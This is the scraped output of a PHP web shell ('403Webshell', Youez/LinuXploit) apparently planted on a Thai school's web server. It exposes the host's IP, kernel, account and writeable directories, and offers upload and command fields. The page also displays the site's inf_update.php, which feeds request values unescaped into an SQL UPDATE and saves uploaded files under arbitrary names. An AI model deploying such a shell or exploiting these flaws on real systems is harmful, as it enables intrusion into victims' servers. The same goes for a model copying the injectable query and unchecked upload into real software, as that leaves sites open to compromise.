403Webshell
Server IP : 27.254.66.5  /  Your IP : 216.73.217.39
Web Server : Apache/2
System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User : technic2 ( 1951)
PHP Version : 7.4.30
Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/technic2/domains/technicrayong.ac.th/private_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/technic2/domains/technicrayong.ac.th/private_html//inf_update.php
<?php 
include('connect.php'); 
	

	if(isset($_GET['link1'])){$link1=$_GET['link1'];}
	if(isset($_POST['link1'])){$link1=$_POST['link1'];}
	if(isset($_GET['link2'])){$link2=$_GET['link2'];}
	if(isset($_POST['link2'])){$link2=$_POST['link2'];}
	if(isset($_GET['link3'])){$link3=$_GET['link3'];}
	if(isset($_POST['link3'])){$link3=$_POST['link3'];}
	if(isset($_GET['link4'])){$link4=$_GET['link4'];}
	if(isset($_POST['link4'])){$link4=$_POST['link4'];}
	if(isset($_GET['link5'])){$link5=$_GET['link5'];}
	if(isset($_POST['link5'])){$link5=$_POST['link5'];}
	if(isset($_GET['pic1'])){$pic1=$_GET['pic1'];}
	if(isset($_POST['pic1'])){$pic1=$_POST['pic1'];}
	if(isset($_GET['pic2'])){$pic2=$_GET['pic2'];}
	if(isset($_POST['pic2'])){$pic2=$_POST['pic2'];}
	if(isset($_GET['pic3'])){$pic3=$_GET['pic3'];}
	if(isset($_POST['pic3'])){$pic3=$_POST['pic3'];}
	if(isset($_GET['pic4'])){$pic4=$_GET['pic4'];}
	if(isset($_POST['pic4'])){$pic4=$_POST['pic4'];}
	if(isset($_GET['pic5'])){$pic5=$_GET['pic5'];}
	if(isset($_POST['pic5'])){$pic5=$_POST['pic5'];}
	if(isset($_GET['usr_id'])){$usr_id=$_GET['usr_id'];}
	if(isset($_POST['usr_id'])){$usr_id=$_POST['usr_id'];}

	if($_POST){
	    if(isset($_FILES['upload1'])){
	        $name_file1 =  $_FILES['upload1']['name'];
	        $tmp_name =  $_FILES['upload1']['tmp_name'];
	        $locate_img ="information/";
	        move_uploaded_file($tmp_name,$locate_img.$name_file1);

	    }
		if(isset($_FILES['upload2'])){
	        $name_file2 =  $_FILES['upload2']['name'];
	        $tmp_name =  $_FILES['upload2']['tmp_name'];
	        $locate_img ="information/";
	        move_uploaded_file($tmp_name,$locate_img.$name_file2);

	    }
		if(isset($_FILES['upload3'])){
	        $name_file3 =  $_FILES['upload3']['name'];
	        $tmp_name =  $_FILES['upload3']['tmp_name'];
	        $locate_img ="information/";
	        move_uploaded_file($tmp_name,$locate_img.$name_file3);

	    }
		if(isset($_FILES['upload4'])){
	        $name_file4 =  $_FILES['upload4']['name'];
	        $tmp_name =  $_FILES['upload4']['tmp_name'];
	        $locate_img ="information/";
	        move_uploaded_file($tmp_name,$locate_img.$name_file4);

	    }
		if(isset($_FILES['upload5'])){
	        $name_file5 =  $_FILES['upload5']['name'];
	        $tmp_name =  $_FILES['upload5']['tmp_name'];
	        $locate_img ="information/";
	        move_uploaded_file($tmp_name,$locate_img.$name_file5);

	    }

	}

$count1 = strlen($name_file1);
if($count1 == 0){
	$file1=$pic1;
}else{
	$file1=$name_file1;
}
$count2 = strlen($name_file2);
if($count2 == 0){
	$file2=$pic2;
}else{
	$file2=$name_file2;
}
$count3 = strlen($name_file3);
if($count3 == 0){
	$file3=$pic3;
}else{
	$file3=$name_file3;
}
$count4 = strlen($name_file4);
if($count4 == 0){
	$file4=$pic4;
}else{
	$file4=$name_file4;
}
$count5 = strlen($name_file5);
if($count5 == 0){
	$file5=$pic5;
}else{
	$file5=$name_file5;
}

	$sqls = "UPDATE information SET inf_link1='$link1',inf_link2='$link2',inf_link3='$link3',inf_link4='$link4',inf_link5='$link5'
	,inf_pic1 ='$file1',inf_pic2 ='$file2' ,inf_pic3 ='$file3',inf_pic4 ='$file4',inf_pic5 ='$file5'
	WHERE inf_id='1'"; 
	$results=mysqli_query($conn,$sqls); 
	
	if($results==1){
					echo "<script language=\"javascript\">";
					echo "alert(\"New Events has been successfully added.\")";
					echo "</script>";
					header("location:admin_page.php?usr_id=$usr_id");
			
			}
	
	?>

Youez - 2016 - github.com/yon3zu
LinuXploit